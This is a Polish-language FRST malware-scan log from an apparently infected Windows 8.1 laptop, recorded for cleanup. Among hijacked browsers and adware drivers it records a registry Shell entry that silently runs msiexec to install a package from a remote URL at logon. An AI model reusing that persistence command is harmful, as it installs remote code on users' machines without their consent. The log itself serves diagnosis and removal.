Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 05-05-2017 02 Uruchomiony przez K (administrator) ASUS (06-05-2017 09:35:26) Uruchomiony z C:\Users\K\Downloads Załadowane profile: K (Dostępne profile: K) Platform: Windows 8.1 (X64) Język: Polski (Polska) Internet Explorer Wersja 11 (Domyślna przeglądarka: "C:\Program Files (x86)\Everbean\Application\chrome.exe" "%1") Tryb startu: Normal Instrukcja obsługi Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Procesy (filtrowane) ================= (Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.) (AMD) C:\Windows\System32\atiesrxx.exe (ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsLdrSrv.exe (ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe (ASUS) C:\Program Files\ASUS\P4G\InsOnSrv.exe (ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.0.3.226\AsusWSWinService.exe (Windows (R) Win 7 DDK provider) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe (Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe (Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe (Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe (Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe (Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe (Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe (ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControl.exe (ASUS) C:\Program Files\ASUS\P4G\InsOnWMI.exe (ASUS) C:\Program Files\ASUS\P4G\BatteryLife.exe (Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeTray.exe (ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe (ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\KBFiltr.exe (ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe (ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe (ASUSTek Computer INC.) C:\ProgramData\AsTouchPanel\AsPatchTouchPanel64.exe (ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe (ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe (Microsoft Corporation) C:\Windows\System32\SkyDrive.exe (AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLoader.exe (ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\QuickGesture\x64\QuickGesture64.exe (ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\QuickGesture\x86\QuickGesture.exe (AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPCenter.exe (Atheros Communications) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe () C:\Program Files (x86)\Bluetooth Suite\ActivateDesktop.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe (SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_IATIEDE.EXE (Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe (Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe (AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPHelper.exe (Google Inc.) C:\Program Files (x86)\Everbean\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Everbean\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Everbean\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Everbean\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Everbean\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Everbean\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Everbean\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Everbean\Application\chrome.exe (ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.2.6.547\AsusWSPanel.exe (Google Inc.) C:\Program Files (x86)\Everbean\Application\chrome.exe ==================== Rejestr (filtrowane) ==================== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.) HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s**RtHDVCpl****C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe -s**kernel32.dll* HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1353432 2013-09-26] (Realtek Semiconductor) HKLM-x32\...\Run: [ASUSPRP] => C:\Program Files (x86)\ASUS\APRP\APRP.EXE [3216032 2013-12-12] (ASUSTek Computer Inc.) HKLM-x32\...\Run: [WebStorage] => C:\Program Files (x86)\ASUS\WebStorage\2.2.6.547\ASUSWSLoader.exe [63272 2015-12-24] () HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [28432392 2017-05-01] (Dropbox, Inc.) HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [132736 2013-11-28] (Atheros Communications) HKU\S-1-5-21-3733692653-1954587215-3579302167-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27427808 2017-02-08] (Skype Technologies S.A.) HKU\S-1-5-21-3733692653-1954587215-3579302167-1001\...\Run: [EPSON Stylus SX100] => C:\Windows\system32\spool\DRIVERS\x64\3\E_IATIEDE.EXE [221696 2008-02-05] (SEIKO EPSON CORPORATION) HKU\S-1-5-21-3733692653-1954587215-3579302167-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj83MkYxFTU8FjRWOYJLNUM1M8VYOWMdMTlLNjExMYQQNF== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\taskmgr.exe: [Debugger] ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [!AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7191} => C:\Program Files (x86)\Common Files\AWS\2.2.6.547\ASUSWSShellExt64.dll [2015-04-22] (ASUS Cloud Corporation.) ShellIconOverlayIdentifiers: [!AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D809} => C:\Program Files (x86)\Common Files\AWS\2.2.6.547\ASUSWSShellExt64.dll [2015-04-22] (ASUS Cloud Corporation.) ShellIconOverlayIdentifiers: [!AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4E} => C:\Program Files (x86)\Common Files\AWS\2.2.6.547\ASUSWSShellExt64.dll [2015-04-22] (ASUS Cloud Corporation.) ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.) ==================== Internet (filtrowane) ==================== (Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{233F7B83-2BD6-4C48-A2F1-FE0A38F18606}: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{DE1334DC-E4B7-4C41-A6BC-8B82FE77449F}: [DhcpNameServer] 40.54.1.16 Internet Explorer: ================== HKU\S-1-5-21-3733692653-1954587215-3579302167-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://asus13.msn.com/?pc=ASJB HKU\S-1-5-21-3733692653-1954587215-3579302167-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://asus13.msn.com/?pc=ASJB SearchScopes: HKU\S-1-5-21-3733692653-1954587215-3579302167-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-3733692653-1954587215-3579302167-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2017-03-14] (Microsoft Corporation) BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2017-03-14] (Microsoft Corporation) Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2016-04-20] (Microsoft Corporation) FireFox: ======== FF DefaultProfile: ye35oxf8.default FF ProfilePath: C:\Users\K\AppData\Roaming\Firefox\Firefox\Profiles\ye35oxf8.default [2017-04-21] FF Extension: (FF Adr) - C:\Users\K\AppData\Roaming\Firefox\Firefox\Profiles\ye35oxf8.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-20] [Brak podpisu cyfrowego] FF Extension: (Polski Language Pack) - C:\Users\K\AppData\Roaming\Firefox\Firefox\Profiles\ye35oxf8.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-04-20] [Brak podpisu cyfrowego] FF SearchPlugin: C:\Users\K\AppData\Roaming\Firefox\Firefox\Profiles\ye35oxf8.default\searchplugins\startsearch.xml [2017-04-20] FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2015-08-22] (Microsoft Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.) FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN) Chrome: ======= CHR HomePage: Default -> hxxp://www.luckysearch123.com?type=hp&ts=1493272726&from=f6800427&uid=toshibaxmq01abf050_24lscq8atxx24lscq8at&z=f7b6c8b883310632741da66gez7t1cbo0m9oem3o3b CHR StartupUrls: Default -> "hxxp://www.luckysearch123.com?type=hp&ts=1493272726&from=f6800427&uid=toshibaxmq01abf050_24lscq8atxx24lscq8at&z=f7b6c8b883310632741da66gez7t1cbo0m9oem3o3b" CHR DefaultSearchURL: Default -> hxxp://www.luckysearch123.com/search.php?type=ds&ts=1493272726&from=f6800427&uid=toshibaxmq01abf050_24lscq8atxx24lscq8at&z=f7b6c8b883310632741da66gez7t1cbo0m9oem3o3b&q={searchTerms} CHR DefaultSearchKeyword: Default -> luck CHR Profile: C:\Users\K\AppData\Local\Google\Chrome\User Data\Default [2017-04-25] CHR Extension: (Prezentacje Google) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-08-04] CHR Extension: (Dokumenty Google) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-08-04] CHR Extension: (Dysk Google) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21] CHR Extension: (YouTube) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-27] CHR Extension: (uBlock Origin) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2017-04-17] CHR Extension: (Google Search) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27] CHR Extension: (Arkusze Google) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-08-04] CHR Extension: (Dokumenty Google offline) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-16] CHR Extension: (Skype) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2017-03-09] CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-09] CHR Extension: (Gmail) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-08-04] CHR Extension: (Chrome Media Router) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-08] CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx HKU\S-1-5-21-3733692653-1954587215-3579302167-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Everbean\Application\chrome.exe (Google Inc.) <==== UWAGA ==================== Usługi (filtrowane) ==================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) R2 ASUS InstantOn; C:\Program Files\ASUS\P4G\InsOnSrv.exe [277120 2013-08-29] (ASUS) R2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage\2.0.3.226\AsusWSWinService.exe [71680 2013-08-16] (ASUS Cloud Corporation) [Brak podpisu cyfrowego] R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [318592 2013-11-28] (Windows (R) Win 7 DDK provider) [Brak podpisu cyfrowego] R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [3042544 2017-03-14] (Microsoft Corporation) S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-05] (Dropbox, Inc.) S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-05] (Dropbox, Inc.) R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [48944 2017-05-01] (Dropbox, Inc.) R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [117424 2017-04-20] () <==== UWAGA R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda) R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [346872 2013-08-22] (Microsoft Corporation) S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23840 2013-08-22] (Microsoft Corporation) R2 WindowsOfficeSrv; C:\ProgramData\Microsoft\Office\PackageLocker.dll [119808 2017-04-20] () [Brak podpisu cyfrowego] <==== UWAGA R2 ZAtheros Bt and Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [323584 2013-11-28] (Atheros) [Brak podpisu cyfrowego] ===================== Sterowniki (filtrowane) ====================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) R3 athr; C:\Windows\system32\DRIVERS\athwbx.sys [3880448 2013-11-13] (Qualcomm Atheros Communications, Inc.) R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWB6.sys [138240 2013-06-22] (Advanced Micro Devices) R3 ATP; C:\Windows\System32\drivers\AsusTP.sys [70928 2013-12-12] (ASUS Corporation) R3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [77464 2013-11-28] (Qualcomm Atheros) R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== UWAGA R3 kbfiltr; C:\Windows\System32\drivers\kbfiltr.sys [17280 2012-08-06] ( ) S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [34760 2013-08-22] (Microsoft Corporation) R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [265056 2013-08-22] (Microsoft Corporation) R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [124256 2013-08-22] (Microsoft Corporation) S3 dbx; system32\DRIVERS\dbx.sys [X] U0 msahci; system32\drivers\msahci.sys [X] ==================== NetSvcs (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) ==================== Jeden miesiąc - utworzone pliki i foldery ======== (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2017-05-06 09:35 - 2017-05-06 09:36 - 00020213 _____ C:\Users\K\Downloads\FRST.txt 2017-05-06 09:33 - 2017-05-06 09:35 - 00000000 ____D C:\FRST 2017-05-06 09:33 - 2017-05-06 09:33 - 02429440 _____ (Farbar) C:\Users\K\Downloads\FRST64.exe 2017-05-03 12:09 - 2017-05-03 12:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox 2017-05-01 16:49 - 2017-05-01 16:49 - 00048944 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe 2017-04-28 08:23 - 2017-04-28 08:23 - 00165187 _____ C:\Users\K\Downloads\FAKTURA-P-1884571-17040587026772-00013145 (1).pdf 2017-04-28 08:22 - 2017-04-28 08:22 - 00165187 _____ C:\Users\K\Downloads\FAKTURA-P-1884571-17040587026772-00013145.pdf 2017-04-28 08:14 - 2017-04-28 08:14 - 00400156 _____ C:\Users\K\Downloads\O26_Faktura_indywidualna_000-038-2595-1777_17_04_F004_AB.pdf 2017-04-25 21:29 - 2017-04-25 21:29 - 00000000 ____D C:\Windows\system32\log 2017-04-25 21:29 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeKrnlBoot.sys 2017-04-25 21:29 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeNetFilter.sys 2017-04-25 21:28 - 2017-04-25 21:28 - 00000000 ____D C:\Users\K\AppData\Roaming\Elex-tech 2017-04-25 21:28 - 2017-04-25 21:28 - 00000000 ____D C:\Program Files (x86)\Elex-tech 2017-04-20 22:20 - 2017-04-25 21:27 - 00002018 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk 2017-04-20 22:20 - 2017-04-25 21:27 - 00001948 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk 2017-04-20 22:20 - 2017-04-21 22:34 - 00000000 ____D C:\Users\K\AppData\LocalLow\Mozilla 2017-04-20 22:20 - 2017-04-20 22:20 - 00000000 ____D C:\Users\K\AppData\Roaming\Mozilla 2017-04-20 22:20 - 2017-04-20 22:20 - 00000000 ____D C:\Users\K\AppData\Roaming\Firefox 2017-04-20 22:20 - 2017-04-20 22:20 - 00000000 ____D C:\Users\K\AppData\Local\Firefox 2017-04-20 22:20 - 2017-04-20 22:20 - 00000000 ____D C:\Users\K\AppData\Local\Everbean 2017-04-20 22:19 - 2017-05-06 08:25 - 00000000 _____ C:\Users\Public\Documents\report.dat 2017-04-20 22:19 - 2017-05-04 21:30 - 00000115 _____ C:\Users\Public\Documents\temp.dat 2017-04-20 22:19 - 2017-04-20 22:20 - 00000000 ____D C:\Program Files (x86)\Firefox 2017-04-20 22:19 - 2017-04-20 22:19 - 00000000 ____D C:\Program Files (x86)\Everbean 2017-04-20 22:19 - 2017-04-20 22:19 - 00000000 _____ C:\Windows\SysWOW64\33 2017-04-20 22:14 - 2017-04-20 22:19 - 00000000 ____D C:\Program Files (x86)\BiaoJi 2017-04-19 08:29 - 2017-04-19 08:30 - 00025885 _____ C:\Users\K\Downloads\Bez-tytułu-1 (1).odt 2017-04-13 14:55 - 2017-04-13 14:56 - 00003568 _____ C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe 2017-04-13 14:54 - 2017-04-13 14:54 - 00000000 ____D C:\Users\K\AppData\Roaming\SSMgre 2017-04-10 10:56 - 2017-04-13 14:56 - 00003558 _____ C:\Windows\System32\Tasks\PowerWord-SCT-JT 2017-04-08 09:12 - 2017-04-08 09:12 - 00000000 ____D C:\b568bd67b485a35ae9ab99ccf95c ==================== Jeden miesiąc - zmodyfikowane pliki i foldery ======== (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2017-05-06 09:24 - 2016-03-10 12:50 - 00000000 __RDO C:\Users\K\SkyDrive 2017-05-06 09:24 - 2015-08-04 20:20 - 00000000 ____D C:\Users\K\AppData\Roaming\Skype 2017-05-06 09:24 - 2015-08-04 19:16 - 00000074 _____ C:\Users\K\AppData\Roaming\sp_data.sys 2017-05-06 09:22 - 2015-08-06 23:15 - 00001150 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job 2017-05-06 08:51 - 2014-04-03 06:28 - 00065536 _____ C:\Windows\system32\spu_storage.bin 2017-05-06 08:38 - 2015-08-06 23:15 - 00001154 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job 2017-05-06 08:19 - 2017-03-07 09:23 - 00003474 _____ C:\Windows\System32\Tasks\ASUS Live Update1 2017-05-06 08:19 - 2015-08-04 20:42 - 00003464 _____ C:\Windows\System32\Tasks\ASUS Live Update2 2017-05-03 12:18 - 2015-08-04 19:20 - 00003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3733692653-1954587215-3579302167-1001 2017-05-03 12:12 - 2017-02-28 22:56 - 00011196 _____ C:\Users\K\Desktop\Ewidencja czasu pracy - umowa zlecenia.xlsx 2017-05-03 12:09 - 2015-08-06 23:14 - 00000000 ____D C:\Program Files (x86)\Dropbox 2017-05-03 12:08 - 2015-08-06 23:28 - 00000000 ___RD C:\Users\K\Dropbox 2017-04-30 21:29 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\Inf 2017-04-29 06:52 - 2015-08-04 19:38 - 00003480 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA 2017-04-29 06:52 - 2015-08-04 19:37 - 00003352 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore 2017-04-27 06:30 - 2015-09-09 09:16 - 00000000 ____D C:\Users\K\AppData\Local\CrashDumps 2017-04-22 08:56 - 2013-08-22 17:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2017-04-22 08:54 - 2015-08-04 20:24 - 00000000 ____D C:\Program Files\Microsoft Office 15 2017-04-21 22:54 - 2015-08-04 19:14 - 00000000 ____D C:\Users\K\AppData\Local\Packages 2017-04-20 22:20 - 2015-08-04 19:41 - 00002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2017-04-20 22:20 - 2015-08-04 19:41 - 00002231 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2017-04-15 19:17 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\AppReadiness 2017-04-13 14:54 - 2017-03-02 08:13 - 00000000 ____D C:\Users\K\AppData\Roaming\ScreenShot 